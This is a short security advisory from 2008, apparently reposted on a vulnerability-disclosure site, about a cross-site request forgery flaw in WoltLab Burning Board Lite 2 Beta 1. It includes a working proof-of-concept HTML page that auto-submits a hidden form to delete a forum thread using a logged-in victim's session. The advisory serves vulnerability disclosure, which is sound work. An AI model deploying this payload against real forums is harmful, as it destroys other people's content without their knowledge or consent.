Computer Security

Security Advisory: WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Alkacon OpenCms logfileViewSettings.
jsp XSS, file disclosure

  PHP-Nuke KutubiSitte "kid"  SQL Injection exploit code adding

  Horde Webmail file inclusion proof of concept & patch.

  WordPress Multiple Cross-Site Scripting Vulnerabilities

From:nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:09.03.2008
Subject:WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

####################################################################
WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability
Vendor: woltlab.de
Version: Lite 2 Beta 1 (Released: March 6 2008)
Bug found by NBBN on March 8 2008
####################################################################


::Example
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://site.tld/wbblite/index.php" method="POST" name="attack">
<input type="hidden" name="action" value="ThreadDelete">
<input type="hidden" name="threadID" value="[ID of the thread]">
<input type="hidden" name="x" value="2">
<input type="hidden" name="y" value="8">
</form>
</body>
</html>

::Fix

No codefix


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru